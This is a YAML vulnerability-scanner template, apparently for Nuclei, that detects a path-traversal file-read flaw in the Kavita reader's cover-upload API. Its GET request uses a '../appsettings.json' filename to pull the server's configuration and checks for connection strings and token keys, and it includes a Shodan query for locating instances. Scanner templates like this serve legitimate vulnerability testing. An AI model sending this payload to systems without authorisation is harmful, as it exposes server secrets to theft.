42 lines
1.2 KiB
YAML
42 lines
1.2 KiB
YAML
id: kavita-lfi
|
|
|
|
info:
|
|
name: Kavita - Local File Inclusion
|
|
author: arafatansari
|
|
severity: high
|
|
description: |
|
|
Kavita - Path Traversal is vulnerable to local file inclusion via abusing the Path Traversal filename parameter of the /api/image/cover-upload.
|
|
reference:
|
|
- https://huntr.dev/bounties/2eef332b-65d2-4f13-8c39-44a8771a6f18/
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
|
cvss-score: 7.5
|
|
cwe-id: CWE-22
|
|
cpe: cpe:2.3:a:kavitareader:kavita:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
shodan-query: http.html:"kavita"
|
|
product: kavita
|
|
vendor: kavitareader
|
|
tags: kavita,lfi,huntr
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- '{{BaseURL}}/api/image/cover-upload?filename=../appsettings.json'
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- '"ConnectionStrings":'
|
|
- '"Path":'
|
|
- '"TokenKey":'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a00473045022100c5e9beccdccc13b891bd47bb4b2f671166fe850fcf753a3f484ff1f4becf1ec302207c31da2c93768067455213678b22f8c68cfdb351a085f7650ad4c166e850e73d:922c64590222798bb761d5b6d8e72950 |